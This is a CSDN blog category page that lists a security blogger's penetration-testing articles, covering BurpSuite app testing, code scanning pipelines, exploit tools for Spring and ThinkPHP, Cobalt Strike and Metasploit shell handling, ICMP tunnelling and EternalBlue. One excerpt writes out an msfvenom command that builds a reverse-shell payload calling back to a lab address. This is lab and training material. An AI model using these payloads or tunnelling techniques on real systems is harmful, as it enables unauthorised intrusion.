![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透测试工具
文章平均质量分 86
归去来兮-zangcc
悟已往之不谏,知来者之可追.实迷途其未远,觉今是而昨非.CSDN博客专家 网络安全领域优质创作者 github漏扫工具搞笑选手 低危表演艺术家-漏洞盒子·公益联盟领袖证书 CNVD原创漏洞证明证书️*7 CVE水洞编号*1 想学习Java安全/代码审计的可以关注我的公众号或联系我 目前在企业做SDL开发安全,每天和代码打交道,搞安全的同时,顺便写写文章解闷,所以有了这个博客。
展开
-
【App渗透】BurpSuite插件-Brida 2024最新自动加解密Custom plugins演示
之前有写过如何安装brida的文章和视频讲解,大家感兴趣的可以看看之前的内容,分别是①BurpSuite插件Brida的安装②Brida js-hook脚本的简单配置和debug调试。我的B站主页今天就是介绍下Brida的核心功能——自动加解密;如何在反编译之后hook加密和解密函数,自动加解密暴破密码。原创 2024-07-16 11:57:46 · 1215 阅读 · 0 评论 -
App渗透:BurpSuite插件-Brida apk逆向自动加解密Custom plugins演示
【App渗透:BurpSuite插件-Brida apk逆向自动加解密Custom plugins演示】很久很久之前,更新过Brida的安装和hook脚本的调试,今晚终于更新了Brida的核心功能,自动加解密。视频里演示的app是我自己开发的,功能比较简单,就是一个登录框,用户名和密码正确就能登录成功。如果大家想要我这个测试app的可以找我要,感兴趣的话可以点击B站链接。原创 2024-07-03 14:47:59 · 324 阅读 · 0 评论 -
2024-BurpSuite快速配置Jython插件环境
很多插件需要python环境,Burpsuite本身是支持java的,Jython就是java和python的结合。本文主要介绍如何在BurpSuite配置Jython。原创 2024-05-27 10:53:09 · 567 阅读 · 0 评论 -
【送书活动第1期】2024最新!依赖扫描神器Trivy的详细使用教程(Jar/Maven/docker images镜像)(文末送书)
Trivy是一款全面的多功能安全扫描器。Trivy 扫描器可以查找安全问题,并能在发现问题的地方锁定目标。可以扫描javax项目依赖,支持jar包依赖扫描以及docker镜像扫描,非常方便,利于安全人员进行代码审计,推动漏洞修复或者渗透测试。原创 2024-04-22 18:09:14 · 2308 阅读 · 12 评论 -
2024新版SonarQube+JenKins+Github联动代码扫描(3)-三者联动配置最终章
终于来到最后了。前面的两篇文章都是配置项,务必能成功启动和运行,才可以进行第三步的联动配置。SonarQube+JenKins+Github三者之间的自动化构建和代码扫描,听起来确实是非常高效率的,但是网上文章都是老版本,很多都是2018左右的版本,照着他们的步骤来,在2024年的今天,新版是完全不一样了,所以我当初配置的时候,也是花了2天的时间,最后总结成3篇文章,供大家参考。原创 2024-03-05 15:12:38 · 927 阅读 · 0 评论 -
2024新版SonarQube+JenKins+Github联动代码扫描(2)-SonarQube代码扫描
这是2024新版SonarQube+JenKins+Github联动代码扫描专题的第二部分,也是核心内容,SonarQube目前是半开源,可以自定义漏洞扫描规则,这个后面有时间可以出一篇教程,本文主要是讲2024最新版的配置和如何进行代码扫描。提示:以下是本篇文章正文内容,下面案例可供参考JenKins安装与配置是SonarQube+JenKins+Github联动代码扫描的第二步。2024新版SonarQube+JenKins+Github联动代码扫描(1)-JenKins安装与配置。原创 2024-03-05 14:42:00 · 1065 阅读 · 2 评论 -
2024新版SonarQube+JenKins+Github联动代码扫描(1)-JenKins安装与配置
Sonar是一个半开源的静态代码扫描工具,试用过一次觉得功能还算可以,所以记录一下SonarQube扫描的用法以及在中大型企业进行SDL安全审计的时候,如果用SonarQube+JenKins+Github三者联动进行代码扫描,快速,方便,自动化!如果大家只关心Sonar的静态扫描,可以看本系列的第二部分,也就是2024新版SonarQube+JenKins+Github联动代码扫描(2)-SonarQube安装与配置,可以在我的博客主页进行搜索。原创 2024-03-05 14:20:30 · 1055 阅读 · 6 评论 -
【逆向】NahamCon CTF -Click Me Writeup(Brida&Frida Hook 拿Flag)
第一次做外国CTF比赛的mobile challenge 题,题目就是一个安卓的apk安装包。顺便记录一下代码分析过程以及分享两种不同的解题思路。这里只想到这两种办法解,如果你还有更好的办法或者思路,欢迎提出。欢迎关注公众号:Eureka安全团队。以后文章多数会以公众号为主。原创 2023-11-23 17:29:41 · 155 阅读 · 0 评论 -
(Chrome Ext)谷歌扩展程序-谷歌插件渗透测试方法记录
浏览器扩展分析,分析 Chrome扩展的漏洞。谷歌浏览器插件渗透测试,代码审计,Chrome扩展程序安全测试。原创 2023-07-20 19:47:57 · 775 阅读 · 0 评论 -
【App渗透】用BurpSuite抓包安卓手机app内容(详细)
用BurpSuite进行抓包,在本机,安卓手机上面作app渗透,详细的用burpsuite在安卓手机上作app渗透的教程。原创 2023-06-26 20:08:21 · 8322 阅读 · 10 评论 -
【踩坑无数终极0错版】mac-Parallels Desktop的windwos虚拟机安装最新夜神模拟器+burpsuite证书安装+app渗透
mac-Parallels Desktop的windwos虚拟机安装最新夜神模拟器+burpsuite证书安装+app渗透原创 2023-05-19 17:33:03 · 4272 阅读 · 11 评论 -
【作者踩坑总结0错版】vscode配置codeql-MacBook(M1/M2芯片-arm)
codeql是一款静态代码分析引擎,适用于安全人员审计源码,挖掘漏洞。在macbook上的vscode配置codeql。原创 2023-05-13 16:10:06 · 2733 阅读 · 11 评论 -
Spring RCE漏洞CVE-2022-22965复现与JavaFx GUI图形化漏洞利用工具开发
Spring RCE漏洞CVE-2022-22965复现与JavaFx GUI图形化漏洞利用工具开发。CVE-2022-22965\Spring-Core-RCE核弹级别漏洞的rce图形化GUI一键利用工具,基于JavaFx开发,图形化操作更简单,提高效率。原创 2022-12-29 11:27:06 · 1956 阅读 · 5 评论 -
【Windows】基于curl命令的Shell上线姿势--解决shiro命令执行工具命令回显拉胯的问题
基于curl命令的Shell上线姿势--解决shiro命令执行漏洞命令回显拉胯的问题原创 2022-11-07 20:21:35 · 1113 阅读 · 0 评论 -
一条命令上线MSF(Metasploit)-web_delivery模块
一条命令上线MSF(Metasploit)-web_delivery模块原创 2022-10-31 22:33:34 · 2490 阅读 · 6 评论 -
基于JavaFx的ThinkPHP漏洞扫描工具---RexHa(Aazhen)的一些说明
基于JavaFx的Thinkphp漏洞扫描工具Rexha的一些使用说明。支持多种payload。多线程并发批量扫描。支持漏洞类型包括:ThinkPHP-2.x-RCE",ThinkPHP-5.0.23-RCE","ThinkPHP5.0.x-5.0.23通杀RCE","ThinkPHP5-SQL注入&敏感信息泄露","ThinkPHP 3.x 日志泄露NO.1","ThinkPHP 3.x 日志泄露NO.2","ThinkPHP 5.x 数据库信息泄露"。原创 2022-10-18 23:38:18 · 6952 阅读 · 31 评论 -
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell
Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的cs与msf互相反弹shell。Linux系统被控主机的反弹shell给cs和cs上的Linux主机反弹shell给msf。原创 2022-09-06 16:07:41 · 2430 阅读 · 2 评论 -
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
利用CrossC2插件工具,将Linux系统的shell反弹回Cobalt_Strike,方便后续的内网渗透。用CrossC2来反弹Linux主机shell给内网渗透工具Cobalt Strike(cs)。原创 2022-08-28 16:30:26 · 3211 阅读 · 9 评论 -
【MacOs系统-M2安装2022新版AWVS渗透工具】-保姆级安装教程
macbook pro M2,安装awvs渗透工具。全称无脑操作,亲测可用,基于docker。兼容macos的M系列芯片,本机使用awvs。mac安装2022新版awvs教程。原创 2022-08-20 03:37:50 · 5944 阅读 · 35 评论 -
【Pingtunnel工具教程】利用ICMP隧道技术进行ICMP封装穿透防火墙
在一些网络环境中,如果不经过认证,TCP和UDP数据包都会被拦截。如果用户可以ping通远程计算机,就可以尝试建立ICMP隧道,将TCP数据通过该隧道发送,实现不受限的网络访问。用户需要在受限制网络之外,预先启动该工具建立代理服务器。再以客户端模式运行该工具,就可以建立ICMP隧道。为了避免该隧道被滥用,用户还可以为隧道设置使用密码。内网渗透,渗透测试,内网隧道技术。......原创 2022-07-19 22:41:27 · 3394 阅读 · 2 评论 -
针对Vue框架渗透测试-未授权访问目录漏洞【渗透实战+工具开发】
针对vue框架渗透测试,vue漏洞,vue未授权访问目录漏洞复现和实战,针对vue未授权目录访问漏洞的安全工具开发,javafx漏洞扫描工具开发。原创 2022-07-18 11:07:37 · 21526 阅读 · 49 评论 -
Kali+docker搭建Vulfocus靶场并配置vulfocus漏洞环境
kali+docker搭建vulfocus靶场环境,并且在vulfocus靶场中添加相对应的安全漏洞环境,方便日常的渗透测试模拟、漏洞复现和安全工具有效性验证等等。最后感谢无私奉献的vulfocus工作人员和开发者。原创 2022-05-25 16:18:58 · 7271 阅读 · 5 评论 -
kail安装资产收集神器-ARL灯塔(安装方法笔记)
「ARL资产安全灯塔」可以快速完成与目标关联的互联网资产侦察工作,节省在渗透测试工作中资产收集与清查时间,提升渗透测试整体效率。**斗象TCC团队**正式发布「ARL资产安全灯塔」开源版,该项目现已上线开源社区GitHub。简单来说就是一款信息收集的神奇,用起来非常方便快捷,比纯手工去信息收集快很多,我用起来也是爽到飞起,十分推荐。原创 2021-12-29 10:46:11 · 11416 阅读 · 5 评论 -
永恒之蓝 (Ms17-010)漏洞复现
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。原创 2021-12-21 10:22:09 · 2559 阅读 · 0 评论 -
渗透小技巧从getshell到3389端口远程桌面连接靶机
渗透或平时比赛中还在为自己命令行操作不熟而感到烦恼吗?直接命令行方式启动远程桌面连接,让效率提高。原创 2021-12-16 13:51:11 · 14226 阅读 · 8 评论 -
小皮.phpstudyV8不知道怎么进入mysql命令行
新版小皮phpstudy_pro V8进入mysql命令行的方式原创 2021-10-02 20:26:01 · 4079 阅读 · 0 评论 -
Metasploit利用ms15-051漏洞进行权限提权
Metasploit利用ms15-051漏洞进行权限提权实验环境虚拟机:kali-linux(攻击机)192.168.18.142window server 2003(靶机)192.168.18.146工具:Metasploit步骤:1、生成木马文件:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.142 lport=4444 -f exe -o /root/shell.exe2、服务器网站目录上创建个shell原创 2021-04-01 01:05:35 · 3655 阅读 · 0 评论 -
Burp Suite抓不了DVWA本地包localhost127.0.0.1的解决办法
Burp Suite抓不了dvwa包的解决办法一、浏览器设置代理二、修改登录地址一、浏览器设置代理首选项>网络设置>设置打开Burp Suite,并且要先确认浏览器已经打开了代理可以发现,无论在dvwa里怎么输入,Burp Suite都抓不了包二、修改登录地址解决的办法是:我们不要用127.0.0.1的本地ip去登录dvwa原创 2020-12-03 11:27:26 · 6433 阅读 · 4 评论